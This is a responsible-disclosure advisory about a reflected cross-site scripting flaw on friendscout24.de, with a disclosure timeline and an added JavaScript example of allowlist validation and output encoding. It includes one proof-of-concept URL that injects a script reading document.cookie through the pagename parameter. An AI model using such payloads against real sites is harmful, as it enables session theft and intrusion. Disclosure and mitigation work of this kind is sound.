SSCHADV2012-025 - www.friendscout24.de - Cross-site Scripting vulnerability
Advisory: www.friendscout24.de – Cross-site Scripting vulnerability
Advisory ID: SSCHADV2012-025
Author: Stefan Schurtz
Affected Software: Successfully tested on www.friendscout24.de
Vendor URL:
Vendor Status: fixed
======================
Vulnerability Description
======================
http://www.friendscout24.de is prone to an XSS vulnerability.
======================
PoC-Exploit
======================
www.friendscout24.de/iftracking.html?pagename=GUEST_LP_26674_de_partnersuche_17'"></style></script><script>alert(document.cookie)</script>&regtracking=true
======================
Solution
======================
fixed
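
The advisory does not describe the vendor's fix. The following is an added example, not code from the vendor or the advisory author, of one way to neutralise this class of input: allowlist validation of pagename followed by HTML output encoding. The function names, the pattern and the rendered markup are assumptions; the pattern is inferred from the legitimate prefix of the PoC value.

```javascript
// Added example: allowlist validation plus output encoding for a reflected
// query parameter. All names and the rendered markup are assumptions.

// Assumption: legitimate pagename values look like the prefix of the PoC value
// (GUEST_LP_26674_de_partnersuche_17): letters, digits and underscores only.
const PAGENAME_PATTERN = /^[A-Za-z0-9_]{1,128}$/;

// Encode the five characters that can change the HTML parsing context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Return the pagename if it passes the allowlist, otherwise null.
function validatePagename(rawUrl) {
  // Placeholder base so that relative request paths can be parsed.
  const url = new URL(rawUrl, 'http://placeholder.invalid');
  const values = url.searchParams.getAll('pagename');
  // Reject a missing or repeated parameter instead of guessing which one wins.
  if (values.length !== 1) return null;
  return PAGENAME_PATTERN.test(values[0]) ? values[0] : null;
}

// Build the response. Encoding is still applied after validation, so a later
// loosening of the pattern does not reopen the injection.
function renderTrackingMarkup(rawUrl) {
  const pagename = validatePagename(rawUrl);
  if (pagename === null) {
    return { status: 400, body: 'invalid pagename' };
  }
  return { status: 200, body: `<div data-pagename="${escapeHtml(pagename)}"></div>` };
}

// Constructed request paths: a benign value and the value from the PoC above.
const BENIGN = '/iftracking.html?pagename=GUEST_LP_26674_de_partnersuche_17';
const POC = `/iftracking.html?pagename=GUEST_LP_26674_de_partnersuche_17'"></style></script><script>alert(document.cookie)</script>`;

console.log(renderTrackingMarkup(BENIGN));
console.log(renderTrackingMarkup(POC));
```

Rejecting the request outright keeps the tracking value out of the page entirely; the encoder covers any code path that renders the value without going through the validator.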
======================
Disclosure Timeline
======================
23-Dec-2012 – informed by contact form
12-Feb-2013 – fixed
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.darksecurity.de/advisories/2012/SSCHADV2012-025.txt